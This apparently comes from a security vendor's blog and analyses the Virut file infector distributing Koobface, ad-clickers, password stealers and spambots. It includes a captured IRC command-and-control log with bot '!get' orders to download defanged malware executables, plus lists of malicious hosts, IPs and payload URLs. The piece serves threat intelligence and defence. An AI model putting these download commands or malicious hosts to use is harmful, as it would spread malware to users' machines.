Virut Distributing Koobface, Ad-Clickers and Spambots

Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users’ systems even when the traditional Av scanners have failed to keep up.

Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.


The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3
JOIN #.xxx

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the “dl.guarddog2009.com” is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Pragma: no-cache
(Incidentally, is the host to s2.zief. pl and dl.guarddog2009. com.)

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds.

This entry was posted in The Law. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *


You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>